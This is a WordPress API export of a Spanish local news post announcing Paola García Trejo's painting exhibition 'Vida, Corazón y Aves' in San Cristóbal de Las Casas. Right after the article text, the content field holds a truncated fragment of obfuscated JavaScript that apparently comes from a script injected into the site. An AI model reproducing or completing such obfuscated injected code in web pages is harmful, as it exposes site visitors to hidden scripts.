{"id":10578,"date":"2023-06-15T04:31:07","date_gmt":"2023-06-15T04:31:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10578"},"modified":"2023-06-15T04:31:08","modified_gmt":"2023-06-15T04:31:08","slug":"invitan-a-exposicion-vida-corazon-y-aves","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10578","title":{"rendered":"Invitan a exposici\u00f3n \u201cVida, Coraz\u00f3n y Aves\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"473\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-14-at-5.03.13-PM-473x1024.jpeg\" alt=\"\" class=\"wp-image-10579\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-14-at-5.03.13-PM-473x1024.jpeg 473w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-14-at-5.03.13-PM-139x300.jpeg 139w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-14-at-5.03.13-PM.jpeg 534w\" sizes=\"auto, (max-width: 473px) 100vw, 473px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal14 de Junio del 2023. San Crist\u00f3bal de Las Casas.- Este 15 de junio a las 6 de la tarde, se realizar\u00e1 la exposici\u00f3n pict\u00f3rica de Paola Garc\u00eda Trejo, en Galer\u00eda de Mi Coraz\u00f3n que se ubica en Calle Guadalupe Victoria n\u00famero 30 B, la cual se titula &#8220;Vida, Coraz\u00f3n y Aves &#8220;, donde el espectador podr\u00e1 observar 10 obras referentes a la tristeza, la alegr\u00eda y la ira.En entrevista, dijo que se trata de 10 piezas en acr\u00edlico, haciendo un tanto referencia a tres emociones como la alegr\u00eda, la tristeza y la ira, representadas por colores, las aves, corazones, \u201cconsidero que de estas emociones, surgen acciones, como principales retom\u00e9 estos tres, son diferentes formatos, desde formato 80 por 60, de 20 por 30, diferentes medidas\u201d.\u201cHay tres piezas principales y dos m\u00e1s que complementan a cada una de estas tres, y una que engloba todas las emociones y una figura humana representando c\u00f3mo lidiamos con ellas, todas estas emociones las vivimos, a veces se combinan, entonces retom\u00e9 todo esto\u201d, agreg\u00f3.Asimismo, dijo que ha participado en diferentes exposiciones colectivas y forma parte de algunos colectivos art\u00edsticos, \u201csoy parte de Galer\u00eda de Mi Coraz\u00f3n, donde tengo obras y ah\u00ed, al igual como en algunas explosiones, se han vendido algunas de mis obras, se han ido a otras partes del pa\u00eds, a Guadalajara, Ciudad de M\u00e9xico\u201d.\u201cSan Crist\u00f3bal es un lugar tur\u00edstico, han acudido a la galer\u00eda y adquirido alguna de mis obras. En Galer\u00eda de Mi Coraz\u00f3n est\u00e1n ocho artistas Enrique Peko, Luis Fernando Terna, Jimena Velasco, Crist\u00f3bal Ruiz, Carlos De la Cruz, Emilio G\u00f3mez, Fabi\u00e1n Ontiveros, son piezas originales, con diferentes estilos y t\u00e9cnicas\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal14 de Junio del 2023. San Crist\u00f3bal de Las Casas.- Este 15 de junio a las 6 de la tarde, se realizar\u00e1 la exposici\u00f3n pict\u00f3rica de Paola Garc\u00eda Trejo, en Galer\u00eda de Mi Coraz\u00f3n que se ubica en Calle Guadalupe Victoria n\u00famero 30 B, la cual se titula &#8220;Vida, Coraz\u00f3n y Aves &#8220;, donde &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10579,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10578","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10578","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10578"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10578\/revisions"}],"predecessor-version":[{"id":10580,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10578\/revisions\/10580"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10579"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10578"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10578"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10578"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}